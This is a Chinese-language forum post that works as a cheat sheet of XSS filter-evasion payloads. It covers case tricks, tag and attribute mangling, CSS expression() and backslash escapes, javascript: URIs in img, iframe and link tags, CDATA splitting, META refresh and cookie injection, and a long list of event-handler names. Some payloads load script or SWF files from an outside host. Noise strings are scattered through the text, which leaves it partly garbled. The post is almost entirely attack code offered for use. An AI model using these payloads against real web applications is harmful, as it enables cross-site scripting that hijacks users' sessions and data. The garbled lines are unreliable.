1. 改变字符大小写
; a* H1 {& s* x: n3 z$ F) U b! c, X: j3 s6 o' q
! k# O5 _! r, N1 Z$ [
# I- M4 m4 L( ~) E* E
<sCript>alert(‘d’)</scRipT>$ O1 J; S# i- ?+ W/ }
/ F ]) |7 V2 q; a7 J; w2. 利用多加一些其它字符来规避Regular Expression的检查7 @" o8 x/ J. D. Z3 A$ A
" |3 V7 ?4 R9 b D2 s) M8 k
<<script>alert(‘c’)//<</script>
! L9 j& q/ l% k3 a! U8 _% @4 F
7 e3 b9 R0 E1 c0 @- B" ^* _ M <SCRIPT a=">" SRC="t.js"></SCRIPT>
) ]# _5 ^* F, n3 M9 M
` W6 } l; @, Q <SCRIPT =">" SRC="t.js"></SCRIPT>3 k3 R1 {! s0 m9 g; m+ T( b" N
+ S6 A( n G4 h- j1 D& Z) ^1 |. u <SCRIPT a=">" ” SRC="t.js"></SCRIPT>4 n$ H' }, K8 L( f% ~4 r" z. c
, c9 k' ~; n! j <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
% `" K5 v) G: h5 Q1 x' h5 ^
/ K$ t- X' F8 p- p4 F- a6 o <SCRIPT a=`>` SRC="t.js"></SCRIPT>
2 [7 c5 V4 V, k4 A
2 e7 d' w5 r3 X1 `. W* X, x, w <SCRIPT a=">’>" SRC="t.js"></SCRIPT> R2 k" N3 T8 Y% J& G/ ]
* {, r. N7 e* D& O- P- E! D) `3. 以其它扩展名取代.js
: Z0 T) v7 e. ?7 f- S2 G d/ S' B$ o! l4 Y2 g# |% H, E9 s
<script src="bad.jpg"></script>
# K' i8 G. i8 X9 _
. i& g- Y# }( q; a) l6 T7 @4. 将Javascript写在CSS档里
' M: A5 H$ C8 g4 V; H1 y, t" I: m7 I! ^) t1 I3 N
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">8 E! W) a3 [7 c7 ^
. c9 c, L4 R- K, k. ^) Y
example:$ g+ z+ O0 ?- B6 I% p/ V
/ }/ h: C% l0 e, [
body {
$ [/ w: z+ K0 i+ M
) j& \/ w+ S& N. |8 [$ K background-image: url(‘javascript:alert("XSS");’)
4 X# @9 S i9 P$ F2 F+ U2 ` v7 |$ d/ t' [: {4 ~' D/ p
}
: [) g" k# Q. u4 y% S" Y& M/ V/ |2 C" q& C4 O/ K" G5 g3 x) |( P
5. 在script的tag里加入一些其它字符
w. e% r1 _! ?& L! Q* x% e/ L: J, X7 R, ^' H1 }
<SCRIPT/SRC="t.js"></SCRIPT>
. {- u3 h7 L6 N* n$ {0 c- n ~2 {4 h+ F- I$ B& |( v1 I
<SCRIPT/anyword SRC="t.js"></SCRIPT>
8 s' ~( s$ `( W D& w2 }, }+ q; s- s8 C+ K: R( M y6 V( E
6. 使用tab或是new line来规避5 w* ]! |9 r$ U& r
7 g" g& \/ X8 [/ i. I5 X( R& a <img src="jav ascr ipt:alert(‘XSS3′)">9 M2 A! x$ r4 H( Y
6 f% s l9 F5 F P0 |: B <img src="jav ascr ipt:alert(‘XSS3′)">1 b. f4 r8 s' e0 L
: o7 o# k' Z( [9 U4 K/ P% D4 n% k
<IMG SRC="jav ascript:alert(‘XSS’);">
3 y' b, X0 A/ f, l4 p& k4 C$ d* Y
& p4 k9 t- s. Y7 s \) P/ N -> tag
3 N; t# R6 Q: _7 `* x% \7 c; ^
6 i- H! ]( [% g' G F5 c" W -> new line0 r: y" x. O) z+ K g& i
* x: y( f+ |' h4 U9 r [7. 使用"\"来规避
& d4 k7 K) V e, ]3 _. L* a v; J
% Q6 I6 I7 N3 Q <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
3 z% Q) R0 D8 z1 w8 t1 V
2 O$ N4 q7 v$ f) m6 f' X <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>/ ~, x9 J2 C0 c, r4 h
0 Y& F" u4 i9 v( q; J# H( V
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
* a5 L, L4 l% r$ Y! w1 {# D U7 j
! ?& K# S, g; [% R <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
9 a3 V2 n# G$ h3 [+ E
; g4 m8 W; v3 Z8 q) W1 l <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>: R4 A3 o+ w# h' w# m
3 ~# G4 }, f/ I& g5 B/ B; ~2 m8. 使用Hex encode来规避(也可能会把";"拿掉)
4 g8 r+ N6 O# B% \! v% R. k; \* Q, \: M! L' {& Q( ~9 f
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 C/ b/ x0 d9 o; D/ U$ {# ?2 J4 S3 p& b
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">9 U; ^7 D ], b7 L$ P$ ]
8 X7 k. L7 Q- C: i" \ ? <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">6 o. ]" W3 j4 }! t0 Q- v
" Y4 w' u$ F1 ~" Q% A, a 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">" \* V' X, ? |0 [: T& F% u. |
- a2 K1 v" K: m8 @
9. script in HTML tag
& A7 G9 w/ h( W; t* ]" V$ |9 g N4 |
1 K4 Q5 c3 u6 ~# U. y <body onload=」alert(‘onload’)」>
- I1 A' I( ]: Y- C0 V4 `0 |2 K1 s0 }
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload1 i7 G( ~! {! P/ I1 T2 A1 ?( U5 p
4 U8 b" P. E" g- t# g4 ^9 t
10. 在swf里含有xss的code
1 V: ~% V' g6 [+ p2 U6 o5 k U$ E3 L* C6 T+ d1 @9 R4 h, F) U( |) ^
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
' \) o. B0 \+ `& ~' d/ q/ `6 G) X: }0 g# L
11. 利用CDATA将xss的code拆开,再组合起来。" a% P7 g( Z9 m+ r- }% Z8 \
: c/ S1 z, }1 x3 Q <XML ID=I><X><C># K7 Y: c; y2 L6 j! j
, k& o( v8 z0 P5 O3 X <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- V. v7 N7 [5 l2 C4 Z. G- V: \
</C></X>
% A( @! V6 j* T
" R$ ~/ t! G, Y4 A </xml>+ U G: q5 Y: T9 A- E0 f
$ |# q' W- H/ C) h- G1 B, @ <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>; K Q. ], w& y' W) M* j
& x/ [; o0 H9 D* V
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
- Y- v5 W1 E# S6 R# ?5 [
6 t* L4 e& T* f* Z <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>4 T; [) |6 U6 P$ j4 m
. w9 p0 g) @5 o$ c l3 j; P
12. 利用HTML+TIME。
8 |4 B/ Y4 \. @. J1 O7 D# F: O& s, I( m
<HTML><BODY>! A5 G' l! _" J7 e, p8 G
4 h+ a! j3 z5 U0 d" B- C4 C, { <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
% b+ |+ e4 q3 Q/ m" R3 y
8 l; I8 R1 L* R% c; ^% Q7 b <?import namespace="t" implementation="#default#time2">+ _5 L$ t* v* j
n& ~$ x, d* m6 B0 {$ N) y/ |( W, Q
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">5 A: [* r- W+ u8 u
$ B9 j( Z& V, w! ?' a/ m
</BODY></HTML>3 G5 m, \6 w* C
4 m0 w: K G" Z6 P v# C13. 透过META写入Cookie。
t. `, G" \6 e5 u8 q5 ^3 {8 B9 w' \
" }! e5 b& M9 W# L: p8 y <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
1 ~& P% ]. g( P. Y) |$ q5 K
/ t* Q! t# E8 S( H5 i) B14. javascript in src , href , url2 |1 n7 J5 D8 |5 {- u3 G; o3 b
7 T' f# x8 K" F+ C
<IFRAME SRC=javascript:alert(’13′)></IFRAME>7 Y1 P7 N. Q) i/ `0 R( P% `) N5 n% j
8 a' T7 v2 G$ M- a% v <img src="javascript:alert(‘XSS3′)">
- d/ S+ w4 T- l. T" i) K7 a1 N* M: Y3 B
<IMG DYNSRC="javascript:alert(‘XSS20′)">
3 `9 x1 I& u1 s/ F5 N0 L( h. p4 h
/ w% g/ A% O9 b* r7 r6 E <IMG LOWSRC="javascript:alert(‘XSS21′)">; p) @8 u/ b, w k! U! c; h
; m, C' j; D. p) n- t
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
: v+ O. u; ]; S9 [" x" H! ?, t$ D2 B3 K
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
; P% [: s [ m( f- \* V e' P$ G" [( G1 b$ |) Z o7 L
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
6 s& d/ N P) `. ~; o& ~0 l' q& }3 I" k% \' D; e% B
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
+ u/ w- T& m9 Y% C% M, c- u/ D( b
; n1 l) Y3 C _4 O6 S5 m5 k <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}3 k$ N2 I' e* \' O! L; E
+ q$ H" @; J, f& k7 }1 v% B2 q
</STYLE><A CLASS=XSS></A>% y2 Y/ ?# q" B( { g
* |" q4 b. V1 ?3 w* H <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>0 q( Y. |; _$ @' A- q5 L: i' u2 t, W+ _
2 ~" u) r7 I0 T( i
|
发表于 2012-12-31 09:59:28
收藏
支持
反对